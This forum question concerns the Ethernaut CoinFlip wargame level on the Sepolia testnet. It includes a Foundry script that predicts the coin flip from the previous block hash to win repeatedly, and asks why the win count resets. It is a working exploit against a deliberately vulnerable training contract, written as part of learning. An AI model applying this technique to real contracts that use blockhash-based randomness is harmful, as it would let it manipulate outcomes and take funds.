Ethernaut level 3 CoinFlip consecutiveWins keep resetting
I am currently running Foundry on VS code on the Sepolia test net and I am on level 3 of Ethernaut's CoinFlip challenge.
I already have a working exploit and I am trying to deploy it 10 times. I am not sure if it is because the network is congested, but the sometimes the consecutiveWins gets resetted. For example, it might go up to 8 wins then reset to 0. I read someone it is because the validators did not include the transaction in the expected block.
Below are my codes:
contract Level3Solution is Script {

CoinFlip public level = CoinFlip(*********************************);
    

function run() external {
    vm.startBroadcast(vm.envUint("PRIVATE_KEY"));
    uint256 blockValue = uint256(blockhash(block.number - 1));
    uint256 FACTOR = 57896044618658097711785492504343953926634992332820282019728792003956564819968;

    uint256 coinFlip = blockValue / FACTOR;
    bool value = coinFlip == 1 ? true : false;
    level.flip(value);
    

    uint256 winCount = level.consecutiveWins();
    console.log("Wins: ", winCount);
    
    vm.stopBroadcast();
  }
}

This is the command I run on the terminal:

forge script script/level3_solution.s.sol -vvvv --broadcast

